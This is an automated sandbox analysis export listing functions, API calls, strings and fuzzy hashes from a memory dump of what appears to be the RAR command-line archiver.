Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID:
String ID: CMT
API String ID: 0-2756464174
Opcode ID: af76a2abfd72360e1299beae298c8050c5b24613a595956e44b66efbb76f8597
Instruction ID: 0a7d983c1f38a23d2e943c649d44b02b88fae8cc838359170ee3a08b62e20c9b
Opcode Fuzzy Hash: af76a2abfd72360e1299beae298c8050c5b24613a595956e44b66efbb76f8597
Instruction Fuzzy Hash: 72D1B16AA186C281EB24FB25D4501BDA3A0FB85B80F844533DE6F476D5DE3CE542C3A1

Function 00007FF7F7EE86D4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F7EE8704

Part of subcall function 00007FF7F7EE4E3C: GetCurrentProcess.KERNEL32(00007FF7F7EE9CC5), ref: 00007FF7F7EE4E69

Strings

., xrefs: 00007FF7F7EE8B24
*?, xrefs: 00007FF7F7EE872B

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: CurrentProcess_invalid_parameter_noinfo
String ID: *?$.
API String ID: 2518042432-3972193922
Opcode ID: 354f185c14a0bc8d05e3972864cc7dbacf8a132eb4984f49e6355014e857c6aa
Instruction ID: e7363390f75ec7465e54082717c77d37bc9ed4a5172f399912144711205e195c
Opcode Fuzzy Hash: 354f185c14a0bc8d05e3972864cc7dbacf8a132eb4984f49e6355014e857c6aa
Instruction Fuzzy Hash: BF51076AF14A9645EB10EFA298000BCA7A4FB44BD4BC55933DE2E57BC5EF3CD0528351

Function 00007FF7F7ECB340 Relevance: 4.5, APIs: 3, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32 ref: 00007FF7F7ECB39A
CheckTokenMembership.ADVAPI32 ref: 00007FF7F7ECB3B1
FreeSid.ADVAPI32 ref: 00007FF7F7ECB3C2

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: db3c1d02e190598f29aa164aeddc5f855d0a4ca8ba77325bab1d25996cb1689a
Instruction ID: 2cbfe421dd180065cb97e0614ae193529026983f72b1363c4ca16ffc58b17814
Opcode Fuzzy Hash: db3c1d02e190598f29aa164aeddc5f855d0a4ca8ba77325bab1d25996cb1689a
Instruction Fuzzy Hash: FC114976B14601CAEB109FB5E4812AEB7B0FB48748F80153ADA9E93B98CF3CC145CB54

Function 00007FF7F7EA3144 Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

GetDiskFreeSpaceExW.KERNEL32(00007FF7F7EA2684), ref: 00007FF7F7EA319F

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: DiskFreeSpace
String ID:
API String ID: 1705453755-0
Opcode ID: 336a33042f1e52100b28f5a1ad6ae687e8956255ef3791e684bc327077314d0d
Instruction ID: c6fd421eb11dad83ba315a0ef3f5f891ed2864a35a24cbcd86f906779ec47942
Opcode Fuzzy Hash: 336a33042f1e52100b28f5a1ad6ae687e8956255ef3791e684bc327077314d0d
Instruction Fuzzy Hash: 7901402672868187EB70EB15E4417EAB3A0FB84744FC00136E69D82688DF3CD606CF90

Function 00007FF7F7EE6130 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 117COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F7EE62AD

Strings

NAN, xrefs: 00007FF7F7EE6191
INF, xrefs: 00007FF7F7EE61A3
NAN(IND), xrefs: 00007FF7F7EE61DB
nan, xrefs: 00007FF7F7EE6198
nan(ind), xrefs: 00007FF7F7EE61E6
nan(snan), xrefs: 00007FF7F7EE61D0
NAN(SNAN), xrefs: 00007FF7F7EE61C5
inf, xrefs: 00007FF7F7EE61B6

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
API String ID: 3215553584-2617248754
Opcode ID: 336881e81ddd14afa9560f251b33c86b073c2b2d41bd1fd01ec7cedf827ef5ce
Instruction ID: 4edc86e448eba9f8075b4f93058967a19a1d2b9531e5da3f3f43cabaa27c429a
Opcode Fuzzy Hash: 336881e81ddd14afa9560f251b33c86b073c2b2d41bd1fd01ec7cedf827ef5ce
Instruction Fuzzy Hash: C541CE7AB09B4589E700DF64E8417ED77A4EB08388F824536EE6D07B95DE3CD026C394

Function 00007FF7F7E97988 Relevance: 13.6, APIs: 9, Instructions: 60COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(00000000,00000100,?,?,00000002,00007FF7F7E97892), ref: 00007FF7F7E979BC
GetStdHandle.KERNEL32 ref: 00007FF7F7E979CA
GetConsoleMode.KERNEL32 ref: 00007FF7F7E979E0
GetConsoleMode.KERNEL32 ref: 00007FF7F7E979EE
SetConsoleMode.KERNEL32 ref: 00007FF7F7E979FC
SetConsoleMode.KERNEL32 ref: 00007FF7F7E97A0A
ReadConsoleW.KERNEL32 ref: 00007FF7F7E97A24
SetConsoleMode.KERNEL32 ref: 00007FF7F7E97A3A
SetConsoleMode.KERNEL32 ref: 00007FF7F7E97A47

Part of subcall function 00007FF7F7E982E4: fflush.LIBCMT ref: 00007FF7F7E9832F

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: Console$Mode$Handle$Readfflush
String ID:
API String ID: 1039280553-0
Opcode ID: 5c62bb105008418d5d8f1a35d4748ced2dc44b1bf30dc7e2d2292546f420945d
Instruction ID: fff6e10ccbfcb7c0d69f044cd1cd1ff570d53b9e9848328021229e348e7ca37b
Opcode Fuzzy Hash: 5c62bb105008418d5d8f1a35d4748ced2dc44b1bf30dc7e2d2292546f420945d
Instruction Fuzzy Hash: 9521982AB1964287EB00AF25A904579A361FF89BA1FD44132EE6B03BE4DE3CD447C750

Function 00007FF7F7ED0140 Relevance: 12.2, APIs: 8, Instructions: 205COMMON

Download Yara Rule

APIs

std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF7F7ED0211
_CxxThrowException.LIBVCRUNTIME ref: 00007FF7F7ED0222
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF7F7ED022D
_CxxThrowException.LIBVCRUNTIME ref: 00007FF7F7ED023E
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF7F7ED03D3
_CxxThrowException.LIBVCRUNTIME ref: 00007FF7F7ED03E4
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF7F7ED03EF
_CxxThrowException.LIBVCRUNTIME ref: 00007FF7F7ED0400

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: ExceptionThrowstd::bad_alloc::bad_alloc
String ID:
API String ID: 932687459-0
Opcode ID: 17b6f32cd8d6fcc81585299b8a9163aaa78fd032cef7b8e26f7336cc4ddc1b9c
Instruction ID: 91f80fbb6cdab5238e1b17463b724d7f9e0b20dfcb194d4e4a00f8858ce03f02
Opcode Fuzzy Hash: 17b6f32cd8d6fcc81585299b8a9163aaa78fd032cef7b8e26f7336cc4ddc1b9c
Instruction Fuzzy Hash: 6281C926A0D68285FB51EB21E5843BDA390FB44B94F9C4532DA6E07BD5DF7CE44383A0

Function 00007FF7F7E8C468 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 420COMMON

Download Yara Rule

APIs

swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7F7E8C7AE
swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7F7E8C97F
swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7F7E8C9DC

Strings

x%u, xrefs: 00007FF7F7E8C96F
xc%u, xrefs: 00007FF7F7E8C9CC
;%u, xrefs: 00007FF7F7E8C79E

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: swprintf
String ID: ;%u$x%u$xc%u
API String ID: 233258989-2277559157
Opcode ID: 18e8202548affe00674286321b5f124759c48e138fb2ddf063aaae7488dbebd7
Instruction ID: 0dbdb480e3cea235213ba97446c4ff46d913cddafa3b070fdbd7af3556c4feb4
Opcode Fuzzy Hash: 18e8202548affe00674286321b5f124759c48e138fb2ddf063aaae7488dbebd7
Instruction Fuzzy Hash: C202B12AA485C241EB24B639A1453FDA751BB42780F840173DAAF4B7E2DE3DF446C3E1

Function 00007FF7F7EA1634 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 133fileCOMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32 ref: 00007FF7F7EA1694
GetShortPathNameW.KERNEL32 ref: 00007FF7F7EA16B5

Part of subcall function 00007FF7F7ECDAC0: CompareStringW.KERNEL32(?,?,?,?,?,?,00007FF7F7EB4C1E,?,?,?,?,?,?,?,00007FF7F7ED9706), ref: 00007FF7F7ECDADF

swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7F7EA175F
MoveFileW.KERNEL32 ref: 00007FF7F7EA17CD
MoveFileW.KERNEL32 ref: 00007FF7F7EA1815

Strings

rtmp%d, xrefs: 00007FF7F7EA1755

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: FileMoveNamePath$CompareLongShortStringswprintf
String ID: rtmp%d
API String ID: 2308737092-3303766350
Opcode ID: de0bcd3fdd60b8f1859e4975922cee0e0ab7dbe13660142ab9f58961243ff5d4
Instruction ID: 18e75554d293e33287a8dd0193ff6415f90cb3d2d24b37a0986cc864885a986e
Opcode Fuzzy Hash: de0bcd3fdd60b8f1859e4975922cee0e0ab7dbe13660142ab9f58961243ff5d4
Instruction Fuzzy Hash: 6051822AA1858645EB30BF25E8455FEA360FF41784FC51132D92F4BADADE3CD606C3A0

Function 00007FF7F7ECB650 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

CreateEventW.KERNEL32 ref: 00007FF7F7ECB66A
CloseHandle.KERNEL32 ref: 00007FF7F7ECB685
CreateEventW.KERNEL32 ref: 00007FF7F7ECB699
GetLastError.KERNEL32 ref: 00007FF7F7ECB6A6
CloseHandle.KERNEL32 ref: 00007FF7F7ECB6C0

Strings

rar -ioff, xrefs: 00007FF7F7ECB65C, 00007FF7F7ECB68B

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: CloseCreateEventHandle$ErrorLast
String ID: rar -ioff
API String ID: 4151682896-4089728129
Opcode ID: 1b32cc9a5b3853ccf39725862a0ac8b7945a78bb0f3e0147b511bdfad103efab
Instruction ID: 9ed3368902466cb8ad98963d9893fc49eb90124f23c1df05cd33a5eefa0b35aa
Opcode Fuzzy Hash: 1b32cc9a5b3853ccf39725862a0ac8b7945a78bb0f3e0147b511bdfad103efab
Instruction Fuzzy Hash: F101282DA1AA1682FB14BB70A9542B5B391AF44715FC44432D83F46AE0CE2D604BC6E0

Function 00007FF7F7ECB470 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 32libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF7F7ECB488
GetProcAddress.KERNEL32 ref: 00007FF7F7ECB4A0
GetProcAddress.KERNEL32 ref: 00007FF7F7ECB4D5

Strings

SetDefaultDllDirectories, xrefs: 00007FF7F7ECB4CB
SetDllDirectoryW, xrefs: 00007FF7F7ECB496
kernel32, xrefs: 00007FF7F7ECB481

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: SetDefaultDllDirectories$SetDllDirectoryW$kernel32
API String ID: 667068680-1824683568
Opcode ID: 8cf5c4d02fd6faa15582d92511ad3bd01355bb3a29212f000fb48e6594ec6bc8
Instruction ID: ba17e9cc5bffe794e917e32e42b5a8ea0b474e1ea9cdaee4bc8fbdd8dd1b1bc6
Opcode Fuzzy Hash: 8cf5c4d02fd6faa15582d92511ad3bd01355bb3a29212f000fb48e6594ec6bc8
Instruction Fuzzy Hash: A6F06D29A09B4682EB00AB11F9500B5A361BF49BC0BC85032DC3F07BA4EE2DE14AC360

Function 00007FF7F7EE1ADC Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 488COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F7EE1B14
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F7EE1E39
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F7EE20BE

Strings

+, xrefs: 00007FF7F7EE1B96
-, xrefs: 00007FF7F7EE1B8B

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: +$-
API String ID: 3215553584-2137968064
Opcode ID: 6f396bf2fa0b9258a91da6205a77601ce69ace0f3c9f84e6f9ba191af742c055
Instruction ID: 3e56f7e6df4fad94740c51359fb896e15cbfaa4085ddc4f1393dab6a7d4f85e7
Opcode Fuzzy Hash: 6f396bf2fa0b9258a91da6205a77601ce69ace0f3c9f84e6f9ba191af742c055
Instruction Fuzzy Hash: BC12A62DE0858385FB24BA15A0446B8B755EB40754FCA4A33D6BB436D0DF3CE6D2C3A6

Function 00007FF7F7E9E49C Relevance: 9.1, APIs: 6, Instructions: 148COMMON

Download Yara Rule

APIs

BackupRead.KERNEL32 ref: 00007FF7F7E9E523
BackupRead.KERNEL32 ref: 00007FF7F7E9E572
BackupSeek.KERNEL32 ref: 00007FF7F7E9E5CB
BackupRead.KERNEL32 ref: 00007FF7F7E9E641
BackupSeek.KERNEL32 ref: 00007FF7F7E9E679
wcschr.LIBVCRUNTIME ref: 00007FF7F7E9E6B4

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: Backup$Read$Seek$wcschr
String ID:
API String ID: 2092471728-0
Opcode ID: bf2be669b84e778a922cb721f987b286462bef24a2ee3b0e5ee0b4462bdc88cd
Instruction ID: 62c370d2acfa4fba6f45bc6995e0ec27ccf7c116bd667dc7195ebb38630bcf07
